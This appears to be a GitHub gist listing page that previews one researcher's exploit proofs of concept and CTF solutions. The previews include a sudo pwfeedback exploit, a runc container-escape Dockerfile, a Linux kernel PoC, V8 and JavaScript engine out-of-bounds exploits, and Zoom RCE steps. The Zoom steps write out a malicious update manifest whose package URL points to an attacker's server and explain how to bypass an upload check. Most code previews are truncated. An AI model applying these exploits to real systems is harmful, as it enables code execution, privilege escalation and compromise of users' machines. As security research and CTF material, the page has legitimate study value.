Skip to content

Instantly share code, notes, and snippets.

@wbowling
wbowling / decrypt.py
Last active Oct 1, 2021
Decryptor for signalino - Midnight Sun CTF 2021
View decrypt.py
#!/usr/bin/env python3
"""
Based on https://github.com/xperylabhub/ios_keychain_decrypter/blob/d7f3089067816cd2adc1ce910c9e1b927a356f37/keychain_decrypt.py#L113
"""
import plistlib
from bpylist import archiver, archive_types
import dataclasses
from Crypto.Cipher import AES
@wbowling
wbowling / amp2020.py
Last active Jun 29, 2020
Solution to amp2020 from 0CTF/TCTF 2020 Quals
View amp2020.py
#!/usr/bin/env python
from pwn import *
import requests
import string
"""
* can add arbitrary html and pass the validator by adding a tag comment inside the <noscript> and close it
* axios uses `input` directly and we can make it an object allowing full param control
* cheerio needs a string, but axios tries to return the response as json. If you add `爀` and set the `responseEncoding` to `ascii` the json parsing fails and it returns text
@wbowling
wbowling / nativity_scene.js
Created May 11, 2020
Nativity Scene from SpamAndFlags CTF 2020
View nativity_scene.js
let oob, oob_rw, base;
function setup() {
oob = new Uint8Array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]);
oob_rw = new BigUint64Array([
0x1111111122222222n,
0x1111111122222222n,
0x1111111122222222n,
]);
@wbowling
wbowling / CVE-2019-18634.py
Last active Sep 8, 2020
POC for CVE-2019-18634
View CVE-2019-18634.py
#!/usr/bin/python
import os
import pty
from pwn import process, sleep, write, read, listen, p64
"""
From https://github.com/sudo-project/sudo/blob/SUDO_1_8_30/src/tgetpass.c#L401:
} else if (c == sudo_term_kill) {
@wbowling
wbowling / README.md
Last active Jun 2, 2021
Zoom RCE - CVE-2019-13567
View README.md

POC - https://youtu.be/zGSLBDo3N7s

  1. Create a malicious update manifest with the Package-url pointing a server you control:
Check-sum=11111111111111111111111111111111;Check2-sum=11111111111111111111111111111111;Update-Option=1;Current-version=5.4.53932.0709;Download-root=https://aw.rs/z;Package-url=https://aw.rs/z/5.4.53932.0709/zoomusInstaller.pkg?t=atupg;Package-name=zoomusInstaller.pkg;Installer-name=;ahcab-name=airhost.zip;sipcab-name=sipcall.zip;codesnippet-name=codesnippet_mac.zip;fullcab-name=zoomusInstallerFull.pkg;
  1. Upload the manifest it to a .zoom.us domain, one example is as the icon for a new https://marketplace.zoom.us/ app (there are client side checks to see if it's an image but they can be bypassed): https://marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg
@wbowling
wbowling / pwn.js
Last active Apr 20, 2021
starCTF (*CTF) 2019 oob-v8
View pwn.js
// uses https://github.com/saelo/jscpwn/blob/master/utils.js
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
let f = wasm_mod.exports.hello;
var arr1 = [1.1];
var arr2 = [Date];
var arr_map1 = arr1.oob();
var arr_map2 = arr2.oob();
@wbowling
wbowling / babyjs.js
Created Apr 20, 2019
TG:HACK 2019 - Baby's First JavaScript Exploitation
View babyjs.js
let oob_arr = [1.1, 0x61616161, 3.3];
function getSetValue(i, v) {
if (v) {
oob_arr[i] = v;
} else {
return oob_arr[i];
}
}
@wbowling
wbowling / cve-2018-5333-poc.c
Created Mar 9, 2019
Example of using CVE-2019-9213 to make previous kernel bugs exploitable
View cve-2018-5333-poc.c
// 4.4.0-116-generic #140-Ubuntu SMP
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
@wbowling
wbowling / Dockerfile
Last active Apr 16, 2019
POC for CVE-2019-5736
View Dockerfile
FROM ubuntu
RUN apt-get update -y && apt-get install -y gcc
RUN ( \
echo '#define _GNU_SOURCE'; \
echo '#include <fcntl.h>'; \
echo '#include <stdio.h>'; \
echo '#include <unistd.h>'; \
\
echo 'char *getenv(const char *__name) {'; \